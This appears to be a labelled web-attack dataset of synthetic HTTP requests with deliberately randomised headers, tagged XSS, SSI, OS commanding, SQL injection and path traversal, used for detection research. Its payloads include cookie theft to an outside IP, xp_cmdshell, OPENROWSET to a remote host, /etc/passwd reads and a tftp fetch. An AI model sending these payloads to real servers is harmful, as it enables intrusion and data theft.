Accept-Language: d-alteEfc, dnsii-iJpeba, E-atdYhe4;q=0.0, 0-leaitmo;q=0.1
Cache-Control: no-cache
Client-ip: 162.23.69.58
Cookie: Ir=4372;t9e=6745644;6iosedoe=pnh6e
Cookie2: $Version="029"
Date: Mon, 06 Feb 06 19:40:00 GMT
ETag: "qmJ@VE5bg4LWn_pk"
Expect: t3ettda=ktisluei;iw3hm
From: stce@ygsk.st
If-Modified-Since: Sat, 05 Sep 09 20:19:26 CET
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: "LJiFlW5t82r5m9yZdIh@"
If-None-Match: *
If-Range: "xVrPC8A0zxEfnwkZ2J"
Max-Forwards: 2
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: Digest qop=auth
Range: 563-54,0904-,88598-0
Referer: http://www.If8d.cz/iShrnxk/atKst/GacCsEs/bPnmIhe.html
TE: trailers,chunked
Trailer: Warning
User-Agent: Mozilla/9.8 (Windows; U; WinNT 9.9; ti-M6; rv:7.7.0) Gecko/78399954
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 5714x2082
Via: HTTP/8.3 209.57.106.131
Transfer-Encoding: gzip
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 197.14.49.35
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40151
Start - Id: 46654
class: XSS
GET /7rnEatptnsEnn/EzahuCnhS6n6ax/AYXwgetyR4/eoYgepnt7.msf? HTTP/1.1
Host: www.dehkr.net
Connection: ehinahg
Accept: audio/*;q=0.7, text/plain, audio/*;q=0.9
Accept-Charset: euc-cn;q=0.8
Accept-Encoding: <img   dynsrc =  "  javascript:    [window.open('http://253.51.88.254/etve.mspx'+document.cookie);]"    >
Client-ip: 252.141.63.116
Cookie: aekrea=s;ishseldi=whKgjN9fL;ubcSnotO=i8G
Date: Mon, 30 Jan 06 16:27:27 CET
If-Modified-Since: Sat, 21 Feb 09 23:41:40 CET
If-Unmodified-Since: Sat, 24 Apr 10 10:19:14 CET
Max-Forwards: 37
MIME-Version: 4.7
Pragma: adqEo=yPsyU3oG
Referer: /dteita71/edtdd/whtaoozy/nchiR.gif
TE: trailers,trailers,trailers
User-Agent: Mozilla/8.3 (Machintosh; U; PPC 8.0; oI-9i; rv:1.6.0) Gecko/93068783
Warning: 191 www.romet.js:190 "OQruhS6yehoutn3ore" "Mon, 30 Apr 07 18:57:18 CET"

null

End - Id: 46654
Start - Id: 40667
class: SSI
GET /jAYDjDxA9AHJ/hedtetraai/XVFL1ropt/ae9d03ar9n/l8uNnTQnt0g0mmP3w2@/fgnriee/op.TEQhUrWm.CVGJJ2/iDeecteiPxgl/ax390wh0i.gif?_JLmwindow.openL=e&emkw=%3C%21--++++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E&3-5.Q9AF9passwdiy=nigftw%5Cfne%27%40&oxI.Pg=o2u8ekesn%3A%5D13oea HTTP/1.1
Host: 217.198.109.78
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.5, compress;q=0.9, compress
Accept-Language: p9tDb-ia7r, srq-y, oaEatt-2, N-E1lu8tz, cae1-h
Cache-Control: no-transform
Client-ip: 164.125.136.123
Cookie: nocmsIas2rn=912324
Cookie2: $Version="21"
Date: Tue, 11 Jul 06 05:34:51 CET
ETag: W/"Q6J6OIeUtDDNbaVKZeC"
Expect: 100-continue
From: 4dtnvda@6tnlilE.st
If-Modified-Since: Fri, 11 Apr 08 23:10:56 GMT
If-Unmodified-Since: Mon, 23 Oct 06 24:08:55 UTC
If-Match: "kfdn1RX75_0zJqGC94"
If-None-Match: *
If-Range: Sat, 02 Jun 07 09:14:05 CET
Max-Forwards: 670
MIME-Version: 9.9
Pragma: no-cache
Authorization: NTLM RWlIaXR0aWVUbW9hZ0VlcnhuUHJ0RXJGMGJlbGNkZW4=
Referer: http://ei9S.fr/ir9ast/sIwneoo/02sslh/Tgini5/axvca.png
TE: trailers,trailers,gzip
Trailer: If-Match
User-Agent: Mozilla/0.7 (Windows; U; Windows NT 0.4; ir-oR; rv:6.6.6) Gecko/73310902
UA-CPU: MIPS
UA-Disp: 7385,808,16
UA-OS: Windows 98
UA-Color: color32
Via: 5.7 www.pnpo4q.tiff:4
Transfer-Encoding: olnood
Upgrade: Ieaz1d/7.8, tans1/5.7, lea1/1.7, 8viely/9.9, eeton/2.9
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40667
Start - Id: 36590
class: OsCommanding
GET /cgi-local/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: 113.61.226.177
Connection: 8lu3tyy
Accept: video/*, application/*, audio/*
Accept-Charset: hz-gb-2312, macintosh, iso-2022-jp;q=0.2, euc-tw;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 88.241.103.90
Cookie: tfcbiaeolEm=aIoar~n;lpo0QOKe9tsF=2;kx6s=oirofsdtotow;6e=csv
Cookie2: $Version="52"
Date: Wed, 19 May 04 24:42:28 GMT
ETag: W/"ii87XQjje42GUbBHrDr"
Expect: 100-continue
From: oAud4eo@aM6ymuu.de
If-Modified-Since: Thu, 26 Mar 09 02:12:14 UTC
If-Unmodified-Since: Sun, 17 Sep 06 13:13:29 UTC
If-Match: *
If-None-Match: "jUpFmEEN-J_DlhUFJX3c"
If-Range: Tue, 28 Feb 06 08:57:46 CET
Max-Forwards: 365
MIME-Version: 0.3
Pragma: t1ta=gonilEa
Proxy-Authorization: Basic em9lZ2xJOmVoVWUzcmpO
Authorization: Basic dHZyb2VpOmk0aEVpNA==
Range: -5
Referer: http://www.fiyha3.st/seeaeodi/nybHt/AbineeRt.php
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: 78EA0oc_ http://www.3tTI1n.uk
UA-CPU: MIPS
UA-Disp: 380,5893,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 5.8 85.216.148.175
Transfer-Encoding: weytp; aa4iwne=on7I4ht
Upgrade: ldezE/3.1, ieuhio/3.5, vasgc/3.8, trl4e/6.5
Warning: 611 www.lnn5olje.js "lioehd4dehdsc3y" 
X-Forwarded-For: 50.37.241.255
X-Serial-Number: 35669547632
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36590
Start - Id: 42175
class: SqlInjection
GET /eeI8Nlse.cfm?euvdqr=%273r2e%40rxmllndroptpvwhrp&OesuIeiOxe=%27+OR+%27ni%27++++%3E+%27S&amms1pmTsfcfol=chHuwqcpiqK&eonh2ctiooonce1=oeimtiyna&0anhcsnwt3hfsr=hP.gb HTTP/1.1
Host: www.4hgh.it
Connection: close
Accept: image/gif
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip;q=0.9, compress;q=0.4, identity;q=0.9, deflate;q=0.3
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 133.121.173.46
Cookie: ddtiaoo=6;sRs3gr5d=rrns;t4uoiy=YxbaTteE e)egit;Q3jnBypK=Enyd;cNAnadt=15anastoGmailc
Cookie2: $Version="96"
Date: Mon, 01 Jun 09 01:02:28 GMT
ETag: W/"_jF9v1M5kcAUe98_Wd"
Expect: 100-continue
From: hmrl@wdteioa4s.uk
If-Modified-Since: Fri, 24 Apr 09 13:33:30 CET
If-Unmodified-Since: Wed, 29 Mar 06 24:23:25 GMT
If-Match: "boYIb4i8MsFnDmJd_V"
If-None-Match: *
If-Range: "MaNbJCEuM_ftW1Ee"
Max-Forwards: 3904
MIME-Version: 5.3
Pragma: eiio=ystj
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: NTLM QWVldHJ1bXNzSHdYMHRicGp0b3l1Z2FuaWlyaG5pY2hyVGFndg==
Range: 1010-
Referer: http://www.jdt6.org/a9cglt/etc5rl/dmog/huqnta4/5blsnssa.cgi
TE: gzip,gzip;q=0.2,trailers
Trailer: Proxy-Authorization
User-Agent: 0oqstehlb (rf6xTZ; o3XsKea; d7zngB; tTP4Xyc; oRpFdRtl5e)
UA-CPU: StrongARM
UA-Disp: 290,899,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: gzip
Upgrade: nredd/1.9, kMnu/6.6, iarn/4.0
Warning: 076 187.215.178.176 "4XWrtebohs" 
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42175
Start - Id: 35946
class: PathTransversal
GET /orcbAK9D6Uv_g.html?3sw9oo=%3C%21--+%23include+++++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+++--%3E&odtDzh=8196&vhnrseB=t5uyrnKLu9 HTTP/1.1
Host: 123.115.187.204:10355
Connection: close
Accept: audio/*;q=0.3
Accept-Charset: *;q=0.8
Accept-Language: *
Cache-Control: adEs7b='dartotx'
Client-ip: 51.18.212.153
Cookie: imdfaoebM0myrmo=eKwISHXp;aS=wpu3tE;dnee3eicntbRsl6= logUut;eZvDVZvClI==e&d systemn6tlensaccess_logtelnet;Lnas=4
Date: Fri, 03 Apr 09 05:05:21 GMT
ETag: "Bpdtq3Au.ki32xpaR-"
Expect: 100-continue
If-Modified-Since: Mon, 12 Jan 04 23:55:38 CET
If-Range: *
Max-Forwards: 74
Referer: /eol4fu/Wsthsr.cfm
TE: deflate;q=0.4
User-Agent: Mozilla/9.4 (Machintosh; U; PPC 3.7; 16-4n; rv:6.7.0) Gecko/73579990
UA-Pixels: 612x0492
Transfer-Encoding: 8aru
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35946
Start - Id: 44462
class: OsCommanding
GET ..%%35%63../..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.eua82k.fr
Connection: close
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.6, us-ascii;q=0.6, windows-1257;q=0.1, koi8;q=0.4, windows-1257;q=0.2
Accept-Encoding: deflate;q=0.2, compress, deflate, deflate, compress;q=0.6
Accept-Language: veryucsb-sd2p, eoeeehii-nhtechsr, toseeen-uIOu, la-ee, semfa-smErdT1n
Cache-Control: max-stale
Client-ip: 1.111.16.222
Cookie: rmsta=5386057;iet=jvoqsa
Cookie2: $Version="3"
Date: Wed, 22 Dec 04 02:57:30 UTC
ETag: W/"HOeVhuxH1l6dtpGLM"
Expect: 100-continue
From: bniw@mamjmaT.net
If-Modified-Since: Wed, 19 Aug 09 21:49:32 UTC
If-Unmodified-Since: Sun, 10 Jul 05 24:31:39 CET
If-Match: *
If-None-Match: "@0agL0twbZzBoki6N88p"
If-Range: Sat, 17 May 08 09:59:05 UTC
Max-Forwards: 50
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: NTLM ZWx0YWFuOXdhdGVvNGlSdGFsdHZoeDBobjByM25UaW9h
Range: 6-02287,72753-
Referer: /ne2v/hgixb/uhzlrm.jsp
TE: trailers
Trailer: Accept-Language
User-Agent: egpecplnedrytotnAtc
UA-CPU: Sparc
UA-Disp: 6571,8343,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 448x826
Via: HTTP/4.0 187.115.150.91, 7.7 www.gft9E.css
Transfer-Encoding: gzip
Upgrade: n7n4g/9.8, isEasp/0.6, dOHut/7.0, ywG/7.6, sesne/6.3
Warning: 500 103.24.153.176 "urwer2tml4" 
X-Forwarded-For: 107.82.88.187
X-Serial-Number: 022178
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44462
Start - Id: 35031
class: SqlInjection
POST /aegacsoeettAxmatka/wauapmt/uQ-.msf? HTTP/1.1
Content-Length: 327
Content-Language: i2en6at,T,ijg
Content-Encoding: gzip
Content-Location: /endeuhs/apsrmse/bdnk/ehaTanr/lbndaa.txt
Content-MD5: YXBSeW15cjJhc25jdHdpcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 27 Feb 10 01:32:26 CET
Last-Modified: Tue, 15 Dec 09 04:08:22 CET
Host: 208.65.162.176
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.4, compress
Accept-Language: ti-s, es-sorie;q=0.4, ro4-Lkfltio1, e4tex5d-E, oae-zna2eunj
Cache-Control: no-cache
Client-ip: 194.197.22.178
Date: Wed, 07 Sep 05 03:01:40 CET
If-Modified-Since: Sun, 21 Nov 04 23:45:06 GMT
If-Unmodified-Since: Sat, 01 Aug 09 20:51:16 UTC
If-Match: "fAf19r5g1qrw@W1"
If-None-Match: *
If-Range: "lGTO.4Y0@PpUcnFk1VI"
Max-Forwards: 0916
MIME-Version: 1.0
Proxy-Authorization: Basic bWR0cmxSeTpydUN0ZXRlcg==
Authorization: rxeiwt mmee=mSaioiaf
Referer: /aMbc/ulaibe/raee/fzePrft.cgi
User-Agent: Tre2sooerB (iez.BP-D.s)
UA-CPU: 68000
----: --------------------

lokha=ltod&iQar73edii='baat>&t8tnRnrfdgatqe=O&Yh1=148890&9egcoqr=ssctgrkgrFen6hh&s9ws0mjrd=oefi&oaooxtopo=geitbE5&oed1irr6mgEhi=3256&IwsomOttrn=kpk&7tettatlraltAaw=rtntcrjheayageiN&H3=cj&home&nnrH3zmufyafnle=';EXEC master.dbo.xp_cmdshell  'cmd.exe&AH0CqqRL7HP=076678072&adaTlwssecnRtl=5382&ssgUwney3iadw8=rswl3qecyo

End - Id: 35031
Start - Id: 36434
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.eq5aa.ch
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8;q=0.6, windows-1250, iso-8859-8-i;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=82
Client-ip: 154.253.32.73
Cookie: nmEiiesisSahp=r30wFPa9
Cookie2: $Version="348"
Date: Sun, 04 Jun 06 20:58:25 UTC
ETag: W/"vq3qcmJoxo@2pB4G"
Expect: ajatsei7=hn7Hs
From: AtjrnsE@aethffn.uk
If-Modified-Since: Fri, 23 Jan 04 01:41:08 UTC
If-Unmodified-Since: Mon, 16 Nov 09 23:26:40 CET
If-Match: *
If-None-Match: "q3nw4Hh5awqlkPsi"
If-Range: Mon, 04 Apr 05 08:15:50 GMT
Max-Forwards: 7090
MIME-Version: 0.7
Pragma: ons0xyr='imf'
Referer: http://www.erisenee.cz/or8u9i/fpsh/iadhEdlt/mgesT27.cfm
TE: deflate;q=0.4
Trailer: Trailer
User-Agent: lueoapiLogF
UA-CPU: PowerPC
UA-Color: color16
UA-Pixels: 006x6469
Via: 4.5 130.9.42.96
Transfer-Encoding: heUo; qzNau=Cdeo
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 113.116.65.59

null

End - Id: 36434
Start - Id: 41761
class: SqlInjection
GET /sTTUuDfAOii.5lzMf/afs1/911UZU/mxe.js?htpi7at1SA=se%3Aa%5DDrh&dnioei5TegestE=08035356&hsm8tDrnonhr=mUWlde&i7w6mww=fbt+s&hlntigsstkl=+%27%25%29%3A+&f6eeomrbFawipu=0faw9ci&ceree=de%3F&sjBFt=emiteedumeEh3a&jV6eiU2WpasswdqmN=uwl8njr&into2es=618&orere=%27UNIONALLSELECTfieldFROMtoonmeWHERE%27%27+++%3D++%27&oh=cr&dsxtlV=wh0mJmhsksometnw HTTP/1.1
Host: 34.37.161.153:2186
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.6, compress
Accept-Language: vft9miay-Ers5ejne;q=0.3, n8maH-9L9Ri, e-9;q=0.0, tgfxt-esr;q=0.7, stiSalE-io
Cache-Control: no-transform
Client-ip: 162.107.37.4
Cookie: r9shi=46699;3KB7CI1u=xdOS;icteloh=15868661;jy1VsamC8pcmdrstdinH=942158;yd6tr6An5ra5=664038
Cookie2: $Version="99"
Date: Thu, 23 Nov 06 12:53:09 UTC
ETag: "xdRpcd80difxy7zp-Wn"
Expect: osevnd
From: lehFo@eioiwni.cz
If-Modified-Since: Tue, 17 Mar 09 11:22:27 CET
If-Unmodified-Since: Mon, 24 Jul 06 04:52:30 UTC
If-Match: "gDP@ZAnsleJxq6xth8"
If-None-Match: "oBBsLb.qbM62md.zyB"
If-Range: *
Max-Forwards: 8488
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic c0F0b3k6ZW4wbm9vdG0=
Authorization: Digest nonce
Range: 4234-490888,-164882
Referer: http://www.Ohdbsa.ch/ti1w/wucmn.jpg
TE: gzip;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/8.6 (Machintosh; U; PPC Mac OS X 4.1; sr-9f; rv:2.3.1) Gecko/31337693
UA-CPU: 68000
UA-Disp: 9710,8359,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9206x518
Via: 1.9 65.212.198.44:49484, FTP/9.6 204.103.111.215, 0.8 45.66.246.243
Transfer-Encoding: deflate
Upgrade: 0rei4d/2.0, titan/4.1, nsj/8.7, ngq/4.4
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 140.12.238.50
X-Serial-Number: 81915611891
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41761
Start - Id: 42348
class: SqlInjection
GET /9m0D0yax1LyH3xl0yZnO/YMZqUArcp-JM%ui0JE/aa7eeeso3chTiknrgt/RBh0ibh10mBuq.l/dPSRB/aaI5v_ZC/o1avadeeaacgui/dtyaait8tl/tot/fat4taitstailnj4uS/uFqztK0ARYgkF.cfm?ny0oneneh=wa%5D&traepx04xedwe=7TzJkQqF&lEge=4&0Bh3=aa&trryatnsx=79961&0r4F5bac=7081614&l5sneirij9nn=sd1b&Ber0adtm03tdAzo=1.fl.P627mTK&4I8y5acceptRWc=%3B+select++++*+from+++OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3DiL5atgsli%3Bpwd%3Ddyh%3BNetwork%3DDBMSSOCN%3BAddress%3D201.198.254.143%2C21115%3B%27%2C%27select+++++*+++++from+++oectEsa%27++%29&e9epoaiiemovi=surcld&Omd=uhj1%3Dsk%26sLuil+etbe1&JkHtVZ=eosbbVS3Lg&d@b8POiD_=rteeA76oule HTTP/1.1
Host: 157.10.106.216
Connection: close
Accept: image/*;q=0.3, application/*, image/*;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.3, windows-1255;q=0.4
Accept-Encoding: *
Accept-Language: i-d9e0ws
Cache-Control: only-if-cached
Client-ip: 106.173.49.114
Cookie: iikaiyol8=ouye;EaVtw6rryn= qbe
Cookie2: $Version="85"
Date: Sat, 04 Sep 04 19:50:59 CET
ETag: "OVVBmY_Rb3C9MGri_gO"
Expect: hoioeia=Artttt;msuR6sft=Rec7diI
From: 9quNt@ct6Iewpcw4.cz
If-Modified-Since: Fri, 26 Jan 07 13:23:12 UTC
If-Unmodified-Since: Thu, 05 Oct 06 02:05:10 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Jan 09 05:48:12 GMT
Max-Forwards: 8112
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic aGlzbGlvZTpyRVU0c3IwMQ==
Authorization: Basic cXJlcjp3czBzYw==
Range: -42018,-510767
Referer: http://www.nacee.st/wslfpe/7pwuanss.txt
TE: gzip;q=0.8,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.3 (Windows; U; Win98 5.9; dm-cg; rv:6.5.9) Gecko/07067094
UA-CPU: PowerPC
UA-Disp: 695,8049,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 999x243
Via: 2.1 www.edhi2y.css
Transfer-Encoding: identity
Upgrade: aia9y/5.8, shfr/4.4, ssoa/6.4
Warning: 478 44.68.67.163:8 "haHdehmpgh" 
X-Forwarded-For: 171.143.1.2
X-Serial-Number: 71261
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42348
Start - Id: 43492
class: OsCommanding
GET /_iL33_8apy0Ekyunion/rjnvZIpy/uQ2phT-Kh/9m/eelrlmentaIh6nkeuRd/iDbTR6dx.G_23Nbn.png?nrcoemah=p6etbi&SbKP8DX=rnnRoecho7xp_icqnQud&exec4formBnR=%7Ccat++%2Fetc%2Fpasswd+++%7C&dysydw=261 HTTP/1.0
Host: 19.214.228.113:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: ame0o0e=Sftdzqt
Client-ip: 247.196.108.175
Cookie: nwtNI=eDcgh;t9suhsde9h3Fo=ilezNyatth3;4CQu=59603;Fetcvlikevar=tOIMhEvQX3r4
Cookie2: $Version="39"
Date: Mon, 19 Jan 04 06:32:46 GMT
ETag: W/"rzo0kdvN8ivh2ko._H"
Expect: 100-continue
From: oie3rs@dut5nl3e.uk
If-Modified-Since: Sat, 12 Apr 08 07:25:22 UTC
If-Unmodified-Since: Sat, 11 Dec 04 08:15:53 GMT
If-Match: "XxbqZKSLwrfvig8"
If-None-Match: *
If-Range: "7yCZLPgOBjNDzS-j"
Max-Forwards: 00
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: NTLM c3hyaU5lc3JmeWV0dmVheW1oZXRudGhlOGNSaEVQYWd0YjdsaGdpdHNlZXMzcnFv
Range: 32-61,4386-85
Referer: http://4iaohyin.cz/oliefld/Lanses/voezesi/3owoia2/epHrofsy.php4
TE: trailers,trailers
Trailer: Connection
User-Agent: hcss/5.2.4.9.3
UA-CPU: Sparc
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: 6.4 www.eUtwttsn.jpg, 4.1 155.99.83.56
Transfer-Encoding: deflate
Upgrade: oifjE/4.1, rq7t/9.9, yvbed9/8.5
Warning: 847 www.0te1.css "ctnpcrbrylblaepn" "Wed, 02 Aug 06 09:38:06 UTC"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43492
Start - Id: 36289
class: PathTransversal
GET /2mejtocotsnbyt0t/SOTMand/raemeur.asmx?adphuie=%2Fetc%2Fhttpd%2Fhttpd.conf&JByKIu=36&ragxss0lL6hnehN=cXY4YbfS&knullm84RmA6fZt=%5Coel%29sspdrzekt&ast57nkod7t=eBchal0vinItmpJo HTTP/1.1
Host: www.nifkitnhwa.uk
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman, windows-1251;q=0.6, gb2312
Accept-Encoding: 
Accept-Language: 6sd-Ehsd;q=0.6, rrtHlsA-Fiot, tltuen-mifhatz, U6ce6-acues;q=0.5, deDisoNo-qnnota5;q=0.2
Cache-Control: max-age=6247
Client-ip: 114.100.144.6
Cookie: 8iitiR1=t=%sek]zIcbgsoundtU>a sock_streamr
Cookie2: $Version="483"
Date: Thu, 07 Jan 10 12:04:48 GMT
ETag: W/"tkoJK.8fzDRFrof_-"
Expect: 100-continue
From: dtehsE@fwehd4rfrs.com
If-Modified-Since: Fri, 17 Sep 04 07:37:11 CET
If-Unmodified-Since: Fri, 04 Sep 09 23:19:52 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 22 Dec 09 07:08:07 CET
Max-Forwards: 882
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: NTLM cmE0b1luZW1udHJiaWNkNW50ZWpvaW42dGVhbTJpYWhu
Range: 48895-751657,65-
Referer: http://hrghlnah.de/terlahEu/Slti1t/iCua/is4tion/eho0leo.jpg
TE: gzip,deflate,deflate;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/0.6 (compatible; iLQh; Linux i586; csnorarah; oofzfntCb; stuyli)
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: HTTP/1.4 153.186.237.157:0, HTTP/4.4 193.22.184.24, 6.2 51.229.2.112
Transfer-Encoding: compress
Upgrade: ye1nNS/5.5
Warning: 517 www.aoior0c.tiff:33767 "TpadeIe" 
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36289
Start - Id: 40834
class: SSI
GET /o_I/d73mzH_JgM-@5sS_.mIE/ty0bnoaea8/nAG/n@2@l/wtqloin7/fEvKCTvk8jw75/w8W_mMNS.p/eZ1Vhh.shtml?SqXobjectYbiniu=%3C%21--%23odbc+++++connect%3D%22dc%2Cjcpt7i%2Creu%22++statement%3D%22select+++*++from++++e%22--%3E HTTP/1.1
Host: www.srthoe8a.it:80
Connection: keep-alive
Accept: application/x-tar;q=0.2, application/*, text/plain;q=0.1
Accept-Charset: iso-8859-2;q=0.6, cp-932, windows-1252, iso-8859-8;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 246.243.47.248
Cookie: BzoNiY7=hteval e\3rm':;dnonGa=0733256;KBlYzdhx7S=zaTahhnsotevosnT;d0ria=Eet<
Cookie2: $Version="55"
Date: Fri, 27 Jun 08 24:33:37 CET
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: 100-continue
From: heeo2q@daRia.de
If-Modified-Since: Wed, 26 Sep 07 05:29:03 UTC
If-Unmodified-Since: Sat, 13 Nov 04 14:11:02 GMT
If-Match: *
If-None-Match: "J_Cz5lDOCxj4AEqV"
If-Range: "DNRHiPsmoDHj8.p@H"
Max-Forwards: 09
MIME-Version: 0.3
Pragma: luTs=lmlfm
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Basic T2FudGFoOm90Z3hsZW93
Range: 4-703669
Referer: /sa4atusA/2hoi0uo/aUcauhrt.zip
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.8 (compatible; MSIE 2.6; Unix; etsy)
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7606x249
Via: FTP/2.2 164.251.101.92, HTTP/3.4 246.153.35.173, FTP/0.5 www.edattOt.png
Transfer-Encoding: identity
Upgrade: aBsae/7.5, Ars/0.8, 2ba7f/1.4, ikeqi/5.4
Warning: 943 www.nneettw.tiff "el9tus" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 40747153756954
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40834
Start - Id: 44571
class: OsCommanding
PUT /attnrc8ifiestqd4/2BQXKw26p05aA/jtlrewfkdlsoeptFoe/vbshnv39e9ilaar/nna.jpg? HTTP/1.1
Content-Length: 98
Content-Language: l
Content-Encoding: compress
Content-Location: /efnae/etierhs/tgfaeuSa/Tclu1dk.php3
Content-MD5: ZXNzczhlNGVlaEJhbzNlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Aug 07 17:04:01 UTC
Last-Modified: Wed, 10 Aug 05 18:32:57 GMT
Host: www.0criehm.com:11
Connection: ittdefl
Accept: */*
Accept-Charset: x-mac-hebrew, iso-8859-9, x-mac-cyrillic, iso-8859-9;q=0.0
Accept-Encoding: gzip;q=0.1, deflate;q=0.0
Accept-Language: m9indt-oan, hvi-eiR;q=0.1, titEeL-nwercqi;q=0.4
Cache-Control: max-age=022
Client-ip: 145.157.177.78
Cookie: ritAeeDSxouanR=Op>hfiHl h
Date: Mon, 08 Nov 04 09:19:07 CET
ETag: "Pdu5B-rYB0AW_8GO"
Expect: uwsaltSm=5myteE;eo7otdz=thwSy7x0
If-Modified-Since: Thu, 20 Mar 08 07:33:29 UTC
If-Unmodified-Since: Wed, 06 May 09 12:33:04 GMT
If-Match: "gTPoAHpVZezeUIwt8"
If-None-Match: *
Max-Forwards: 8
MIME-Version: 1.5
Pragma: naisj='h'
Proxy-Authorization: rnerea 2nhwteS=toea
Authorization: atHYm iOhoT1ea=saeil
Referer: /yqrtcia/nstih/rsNpoo/fnnbW6a/0Aljscp.gif
TE: gzip;q=0.4
User-Agent: Mozilla/6.5 (Machintosh; U; Mac OS X 2.3; dl-um; rv:1.6.6) Gecko/81649187
UA-OS: Win95
Via: FTP/5.6 178.17.91.193, HTTP/6.1 184.42.102.206, 9.3 www.mceleeS.htm
Transfer-Encoding: gzip
X-Forwarded-For: 21.178.56.88
----: --------------------------------

K9XyZ-zk7Z=187.67.43.232|   tftp 192.168.10.33 evil.txt&oOnr3Oijllnr9x=14&9Tk99=|An 3so8Rep|

End - Id: 44571
Start - Id: 37622
class: LdapInjection
